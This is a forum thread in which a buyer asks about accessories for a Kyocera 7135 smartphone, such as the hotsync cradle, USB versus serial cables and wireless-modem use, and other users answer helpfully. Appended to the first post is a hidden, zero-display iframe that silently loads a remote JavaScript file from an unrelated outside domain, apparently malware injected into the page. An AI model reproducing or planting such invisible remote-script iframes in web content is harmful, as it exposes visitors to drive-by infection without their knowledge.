I just ordered my 7135 from Verizon, 1-day shipping. I'm going on extended travel in 5 days, so I want to make sure I have all the accessories, etc, I need before I leave town. Feedback from experienced users would be enormously helpful. These are questions, some stupidly basic, that I have been unable to find answers to on the web, or from Verizon. THANK YOU.
1. Does it include a hotsynch cradle, or is that an optional accessory?
2. If the cradle is not included, I assume the function can be accomplished with some other cable included. I assume it comes with a USB and a serial cable; I also assume the USB is NOT 2.0, but still would be way faster than serial. Correct?
3. Wireless Modem: can the unit be used in this mode with an included cable? (again, I assume the USB is included and faster; correct?)
4. Are there any generally useful or essential accessories?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
1. yes, a cradle is included. you can unplug the charger from the cradle and take it with you as a travel charger leaving the cradle behind.
2. cradle is included so no standalone cable is included. the cradle terminates in two ends, USB and serial. the 7135 does not suppoort usb 2.0.
3. yes, the 7135 can be used as a wireless modem and has a app to specifically switch into that mode. fairly straightforward to setup it for use as a wireless modem. no standalone usb cable is included for this (although you can use the cradle for this function), you will have to purchase the cable on your own. I recommend dan from "danscellphones". You can find him in the 7135 accessories forum at www.smartphonesource.com . His prices are the lowest you will find and are genuine Kyocera products.
4. large SD card for backingup the device and storing mp3s, bebop's new 7135 mp3 player (see the smartphonesource forums), and one of coolcat's headphone/headset adaptors to allow you to use a pair of standard headphones with your 7135 (again, see the same fourm referenced above).
THANKS VERY MUCH!!! One or two clarification points, pleas.

What's a "standalone cable"? does "terminates in two ends" mean that it has two jacks/sockets? If so, then I need a USB(male)-USB(male) cable to connect it to my PC, correct?

When I say "standalone" cable, I simply mean a cable that is not connected to the cradle. So for the 7135 USB cable, it would have a compatible 7135 connector on one end (to connect to the phone) and a standard USB end to connect to the computer, nothing special. This cable can be used for syncing or for connecting your 7135 to a computer for use as a wireless modem
When I say terminates in two ends, I mean that there is one cable that comes out of the cradle and then it splits into two ends, one with a serial end, one with a USB end. Either of these ends will connect fine to the appropriate serial/USB port on your computer. No extra cable is required to connect the 7135's cradle to your computer.
